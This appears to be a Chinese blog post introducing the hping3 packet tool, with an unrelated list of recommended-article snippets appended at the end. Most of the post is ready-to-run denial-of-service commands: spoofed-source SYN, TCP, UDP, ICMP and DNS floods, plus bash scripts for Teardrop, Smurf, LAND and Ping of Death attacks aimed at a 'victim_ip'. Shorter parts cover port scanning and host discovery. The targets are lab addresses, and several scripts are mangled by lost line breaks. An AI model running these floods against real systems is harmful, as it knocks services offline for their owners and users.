hping3工具介绍
端口扫描
sudo hping3 -I eth1 -S 192.168.180.133 -p 80
SYN Flood
默认协议:tcp
默认端口:随机
默认源地址:攻击者本机IP地址
通过eth1,发送SYN报文到 192.168.180.133:80。伪造源地址为192.168.180.131,时间间隔1000us。
sudo hping3 -I eth1 -S 192.168.180.133 -p 80 -a 192.168.180.131 -i u1000
通过eth1,发送SYN报文到192.168.180.133:80,伪造随机源地址,时间间隔1000us。
sudo hping3 -I eth1 -S 192.168.180.133 -p 80 --rand-source -i u1000
通过 eth1,发送SYN报文到192.168.180.133:80,伪造随机源地址,发动洪水攻击,不会显示数据和丢包的统计。
sudo hping3 -I eth1 -S 192.168.180.133 -p 80 --rand-source --flood
sudo hping3 -c 1000 -d 120 -S -p 80 --flood --rand-source 192.168.180.133
sudo hping3 -S -P -U -p 80 --flood --rand-source 192.168.180.133
TCP Flood
sudo hping3 -SARUPF -p 80 --flood --rand-source 192.168.180.133
UDP Flood
发送udp报文到192.168.180.133:80
sudo hping3 --udp 192.168.180.133 -p 80
发送 udp 报文 到 192.168.1.1:80。伪造随机源地址,洪水攻击。
sudo hping3 --udp 192.168.180.133 -p 80 --rand-source --flood
sudo hping3 --udp -s 6666 -p 53 -a 29.29.29.29 --flood 192.168.180.133
ICMP Flood
发送icmp报文到192.168.180.133
sudo hping3 --icmp 192.168.180.133
发送icmp报文到192.168.180.133,伪造随机源IP地址,供水攻击
sudo hping3 --icmp 192.168.180.133 --rand-source --flood
sudo hping3 -q -n -d 200 --icmp --flood -a 28.28.28.28 192.168.180.133
DNS Flood
发送udp报文到192.168.180.133:53 伪造随机源IP地址,洪水攻击
sudo hping3 --udp 192.168.180.133 -p 53 --rand-source --flood
Teardrop攻击
基于hping3的测试脚本(脚本测试有问题)
#!/bin/bashfunction teardrop()
{local victim_ip=$1local id_begin=$2local id_end=$3for(( id=${id_begin}; id<${id_end}; id++))dohping3 --icmp ${victim_ip} --data 1000 --id ${id} --count 1 --morefraghping3 --icmp ${victim_ip} --data 200 --id ${id} --count 1 --fragoff 400done
}teardrop $*
Smurf攻击
保存成shell脚本执行格式如下:
sudo ./smurf.sh 192.168.180.133 192.168.180.2
#!/bin/bash
function smurf ( )
{local victim_ip=$1local broadcast_ip=$2hping3 --icmp ${broadcast_ip} -a ${victim_ip} --flood
}smurf $*
手动测试
sudo hping3 -1 -a 192.168.180.133 192.168.180.255
XMAS TREE攻击
sudo hping3 -SFRP 192.168.180.133
LAND攻击
LAND攻击方式采用了特别构造的TCP SYN数据包(通常用于开启一个新的连接),使目标机器开启一个源地址与目标地址均为自身IP地址的空连接,持续地自我应答,消耗系统资源直至崩溃,这种攻击方法与SYN洪泛攻击并不相同
将下面代码保存为land.sh
#!/bin/bashfunction land()
{local victim_ip=$1local victim_port=$2hping3 -S ${victim_ip} -p ${victim_port} -a ${victim_ip} --flood
}land $*
执行:sudo ./landhping3.sh 192.168.180.133 80
手动执行:sudo hping3 -n -S -p 80 -a 192.168.180.133 --flood 192.168.180.133
Ping of Death
其攻击原理是攻击者A向受害者B发送一些尺寸超大的ICMP(Ping命令使用的是ICMP报文)报文对其进行攻击(对于有些路由器或系统,在接收到一个这样的报文后,由于处理不当,会造成系统崩溃、死机或重启)
将下面代码保存为pingofdeath.sh
#!/bin/bash
function ping_of_death()
{local victim_ip=$1local id=186local data_size=1450let icmp_size=${data_size}+8hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag for i in $(seq 50)dolet offset=${i}*${icmp_size}hping3 --icmp ${victim_ip} --data ${data_size} --id ${id} --count 1 --morefrag --fragoff $offsetdone
}ping_of_death $*
执行:sudo ./pingofdeath.sh 192.168.180.133
ICMP测试
sudo hping3 -1 192.168.180.133
数据包跟踪
sudo hping3 --traceroute -V -1 www.qq.com
端口扫描
单端口扫描:
sudo hping3 -I eth1 -p 22 -c 1 -S 192.168.180.133
返回的信息中含有flags=SA 表示端口是通的 SYN+ACK ,如果返回flags=RA 则表示端口不通
多端口扫描
sudo hping3 -I eth1 -8 1-1024 192.168.180.133
返回结果如下:
kali@kali:~/Downloads/ddos/hping3test$ sudo hping3 -I eth1 -8 1-1024 192.168.180.133
Scanning 192.168.180.133 (192.168.180.133), port 1-1024
1024 ports to scan, use -V to see all the replies
+----+-----------+---------+---+-----+-----+-----+
|port| serv name | flags |ttl| id | win | len |
+----+-----------+---------+---+-----+-----+-----+
All replies received. Done.
Not responding ports: (21 ftp) (22 ssh) (23 telnet) (25 smtp) (53 domain) (80 http) (111 sunrpc) (139 netbios-ssn) (445 microsoft-d) (512 exec) (513 login) (514 shell)
主机发现
for addr in $(seq 1 254);do hping3 192.168.180.$addr -c 1 --icmp >> result.txt & done
参考:
https://wp.baijinming.com/00/id=2576.html
https://man.linuxde.net/hping3
https://www.cnblogs.com/liuxinyustu/articles/12808972.html
https://mochazz.github.io/2017/07/23/hping3/
http://www.legendwolf.com/?id=57
hping3工具介绍相关推荐
- 软件包管理 之 软件在线升级更新yum 图形工具介绍
作者:北南南北 来自:LinuxSir.Org 提要:yum 是Fedora/Redhat 软件包管理工具,包括文本命令行模式和图形模式:图形模式的yum也是基于文本模式的:目前yum图形前端程序主要 ...
- IDEA IntelliJ 开发工具介绍
IntelliJ IDEA 开发Java的IDE 官网:https://www.jetbrains.com/ 下面是该工具介绍,有兴趣的可以看下,基本一堆废话: 集成开发环境(IDE,Integrat ...
- postman 接口测试工具介绍
postman 接口测试工具介绍 https://www.cnblogs.com/fly_dragon/p/9186745.html
- Java代码缺陷自动分析工具介绍
Java代码缺陷自动分析工具介绍 ...
- 77.Linux系统日志,screen工具介绍
Linux系统日志 日志重要吗?必须的,没有日志我们怎么知道系统状况?没有日志如何排查一个trouble?日志记录了系统每天发生的各种各样的事情,你可以通过他来检查错误发生的原因,或者受到***时** ...
- Exchange Server 2003多服务器安装以及管理工具介绍
Exchange服务器系列课程之二--Exchange Server 2003多服务器安装以及管理工具介绍 http://www.z8soft.com/article/server| 2011年4月1 ...
- soapui工具_python接口自动化(四)--接口测试工具介绍(详解)
简介 "工欲善其事必先利其器",通过前边几篇文章的介绍,大家大致对接口有了进一步的认识.那么接下来让我们看看接口测试的工具有哪些. 目前,市场上有很多支持接口测试的工具.利用工具进 ...
- Java新手看招 常用开发工具介绍
Java新手看招 常用开发工具介绍 Java的应用越来越广泛,学习Java的人也越来越多.学过程序设计的人知道,使用Basic进行程序设计,可以使用QBasic.Visual Basic等开发工具:使 ...
- arcgis python工具-使用python制作ArcGIS插件(1)工具介绍
使用python制作ArcGIS插件(1)工具介绍 by 李远祥 ArcGIS从10.0开始支持addin(ArcGIS软件中又叫作加载项)的方式进行插件制作.相对于以往9.x系列,addin的无论是 ...
最新文章
- Flutter 仿掘金之动态Tabbar
- 当 IDENTITY_INSERT 设置为 OFF 时,不能为表中的标识列插入显式值
- Couldn‘t find grammar element for class javax.ws.rs.core.Response(没有解决)
- linux如何备份网站,linux怎么备份网站
- c语言算ex自定义函数,用C语言写定积分的通用函数:sin(x),cos(x),eX.
- 计算机图形学二维图形基本变换实验原理,计算机图形学实验:二维图形变换.docx...
- CentOS7救援模式以及救援模式的网络配置
- 关于SpringMVC中text/plain的编码导致的乱码问题解决方法
- 树的基本定义表示方法
- 挂yy协议的服务器,yy协议挂机工具免费版
- [HBase进阶]--rowkey设计要点(官方文档介绍)
- 中国科学院深圳先进技术研究院合成所赵国屏研究员课题组2022年招聘启事
- 2022年国家高新技术企业申报秘笈来了
- Spark数据挖掘实例1:基于 Audioscrobbler 数据集音乐推荐
- 利用PaddleDetection自制自己的图像预测项目(二)摄像头检测获得坐标
- 应用 Rational 工具简化基于 J2EE 的项目第 8 部分 :测试软件
- Android 天气APP(五)天气预报、生活指数的数据请求与渲染
- Linux 无线网络断开的解决方案
- 3ml乐谱制作工具_用于生产的ML基础结构工具(第1部分)
- 【】每日360题,2019.11.05日21点财会类考试习题答案